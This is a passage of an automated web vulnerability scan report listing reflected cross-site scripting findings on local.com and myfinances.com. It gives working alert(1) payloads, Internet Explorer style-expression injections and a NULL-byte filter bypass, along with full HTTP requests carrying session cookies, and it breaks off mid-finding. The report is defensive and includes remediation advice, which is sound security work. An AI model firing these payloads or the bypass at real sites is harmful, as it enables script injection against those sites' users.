GET /events/category/music/dallas-tx.aspx?8c9e7'-alert(1)-'22f4ee6710f=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
4.473. http://www.local.com/events/category/performing-arts/dallas-tx.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/events/category/performing-arts/dallas-tx.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e4c'-alert(1)-'1c8163cafb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/category/performing-arts/dallas-tx.aspx?60e4c'-alert(1)-'1c8163cafb2=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas Theatre and Comedy Eve ...[SNIP]... <a href="/events/events_map.aspx?location=dallas%2c+tx&category=performing_arts&60e4c'-alert(1)-'1c8163cafb2=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);"> ...[SNIP]...
4.474. http://www.local.com/events/category/sports/dallas-tx.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/events/category/sports/dallas-tx.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d6b'-alert(1)-'8080df3d42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/category/sports/dallas-tx.aspx?66d6b'-alert(1)-'8080df3d42=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d27c6"%3b652d94a4b4b was submitted in the cid parameter. This input was echoed as d27c6";652d94a4b4b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /results.aspx?keyword=banks&cid=506d27c6"%3b652d94a4b4b&client=ca-dp-r-mark03_3ph_js HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c80ba"style%3d"x%3aexpression(alert(1))"45503434253 was submitted in the cid parameter. This input was echoed as c80ba"style="x:expression(alert(1))"45503434253 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=banks&cid=506c80ba"style%3d"x%3aexpression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a134f"style%3d"x%3aexpression(alert(1))"fccc9411126 was submitted in the client parameter. This input was echoed as a134f"style="x:expression(alert(1))"fccc9411126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style%3d"x%3aexpression(alert(1))"fccc9411126 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.478. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.local.com
Path: /results.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a378"style="x:expression(alert(1))"043ffc8a60a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f6f"%3bb0022a17af6 was submitted in the keyword parameter. This input was echoed as b0f6f";b0022a17af6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topics/?topic=food&keyword=foodb0f6f"%3bb0022a17af6 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 8cbb2<script>alert(1)</script>2eab8d1e87a was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the articleKey request parameter is copied into the HTML document as plain text between tags. The payload 76469<script>alert(1)</script>5cd27d00a02 was submitted in the articleKey parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.482. http://www.myfinances.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af164"><script>alert(1)</script>bfea6dcd612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?af164"><script>alert(1)</script>bfea6dcd612=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:03:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:03:03 GMT Content-Length: 17806 Connection: close Set-Cookie: adc=RSP; path=/;
4.483. http://www.myfinances.com/blog.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b441b'><script>alert(1)</script>2d6ce3f1de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog.html?b441b'><script>alert(1)</script>2d6ce3f1de5=1 HTTP/1.1 Host: www.myfinances.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 16:26:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 16:26:26 GMT Connection: close Vary: Accept-Encoding Set-Cookie: adc=RSP; path=/; Content-Length: 17748
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %007485b'><script>alert(1)</script>abffe3120a4 was submitted in the page parameter. This input was echoed as 7485b'><script>alert(1)</script>abffe3120a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog.html?page=1%007485b'><script>alert(1)</script>abffe3120a4 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:01:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:01:58 GMT Content-Length: 17623 Connection: close Set-Cookie: adc=RSP; path=/;
4.485. http://www.myfinances.com/blog/3171093.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3171093.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e47d"><script>alert(1)</script>cddac6d471e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:05:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:05:23 GMT Content-Length: 13431 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How The Dow Jones Industrial Average Is Calculated' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1'"> ...[SNIP]...
4.486. http://www.myfinances.com/blog/3171103.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3171103.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c279"><script>alert(1)</script>be8d26e1d8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:05:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:05:21 GMT Content-Length: 13823 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Know If You're On Track For Retirement' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1'"> ...[SNIP]...
4.487. http://www.myfinances.com/blog/3227953.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3227953.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 434d0"><script>alert(1)</script>5608a968905 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:05:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:05:13 GMT Content-Length: 14027 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Estimate the Value of Your Home' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1'"> ...[SNIP]...
4.488. http://www.myfinances.com/blog/3227963.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3227963.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a08c1"><script>alert(1)</script>dd5051c38cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:58 GMT Content-Length: 13645 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'Avoid Wash Sales' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1'"> ...[SNIP]...
4.489. http://www.myfinances.com/blog/3241183.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3241183.html
Issue detail
